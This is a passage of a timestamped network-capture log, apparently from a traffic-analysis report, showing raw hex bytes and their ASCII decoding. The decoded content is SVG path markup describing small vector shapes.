                                                                                                                                                                              2023-09-15 05:27:26 UTC1236INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                              Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                              2023-09-15 05:27:26 UTC1252INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                              Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                              2023-09-15 05:27:26 UTC1268INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                              Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                              2023-09-15 05:27:26 UTC1284INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                              2023-09-15 05:27:26 UTC1300INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                              2023-09-15 05:27:26 UTC1316INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                              Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                              2023-09-15 05:27:27 UTC1332INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                              Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                              2023-09-15 05:27:27 UTC1348INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                              Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                              2023-09-15 05:27:27 UTC1364INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                              Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                              2023-09-15 05:27:27 UTC1380INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                              Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                              2023-09-15 05:27:27 UTC1396INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                              Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                              2023-09-15 05:27:27 UTC1412INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                              Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                              2023-09-15 05:27:27 UTC1428INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                              Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                              2023-09-15 05:27:27 UTC1444INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                              Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                              2023-09-15 05:27:27 UTC1460INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                              Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                              2023-09-15 05:27:27 UTC1476INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                              Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                              2023-09-15 05:27:27 UTC1492INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                              Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
